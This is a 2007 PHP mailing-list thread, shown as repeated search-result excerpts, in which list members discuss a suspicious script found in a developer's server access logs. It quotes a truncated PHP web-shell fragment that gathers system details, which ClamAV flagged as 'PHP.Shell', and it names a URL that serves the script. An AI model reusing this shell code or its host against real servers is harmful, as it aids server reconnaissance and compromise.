I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)
?
$ker = @php_uname();
$osx = @PHP_OS;
echo f7f32504cabcb48c21030c024c6e5c1abr;
echo h2SysOSx:$ker/h2/br;
echo h2SysOSx:$osx/h2/br;
if ($osx ==
Paul Scott wrote:
I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)
Interestingly enough, MimeDefang/ClamAV quarantined your message
because of that script:
Quarantine Messages:
On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
Quarantine Messages:
Message quarantined because of virus: PHP.Shell.
Someone saw it somewhere and reported it...
Don't you love Free Software? ;)
--Paul
All Email originating from UWC is covered by
On 10/5/07, Paul Scott [EMAIL PROTECTED] wrote:
On Fri, 2007-10-05 at 07:38 -0600, Ashley M. Kirchner wrote:
Quarantine Messages:
Message quarantined because of virus: PHP.Shell.
Someone saw it somewhere and reported it...
Don't you love Free Software? ;)
--Paul
On 10/5/07, Ashley M. Kirchner [EMAIL PROTECTED] wrote:
Daniel Brown wrote:
The biggest issue does still remain: if this is on your local
system, you need to figure out exactly how it got there in the first
place
I thought the OP said he noticed it in his logs... I understood
Daniel Brown wrote:
Yeah, honestly I wasn't sure if it was an injection attack or if
those URLs were referrers in the logs.
If you hit the first URL ( http://www.vesprokat.ru/n ) with, say
lynx, you get that script coming up. So it could've been referral
hits. Which could mean the
On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
Yeah, honestly I wasn't sure if it was an injection attack or if
those URLs were referrers in the logs.
OK sorry if I wasn't 100% clear here, but the logs showed up something
like:
On 10/5/07, Paul Scott [EMAIL PROTECTED] wrote:
On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
Yeah, honestly I wasn't sure if it was an injection attack or if
those URLs were referrers in the logs.
OK sorry if I wasn't 100% clear here, but the logs showed up something
like:
Daniel Brown wrote:
The biggest issue does still remain: if this is on your local
system, you need to figure out exactly how it got there in the first
place
I thought the OP said he noticed it in his logs... I understood
that as someone cleverly trying to inject it somehow and it ended
9 matches
Mail list logo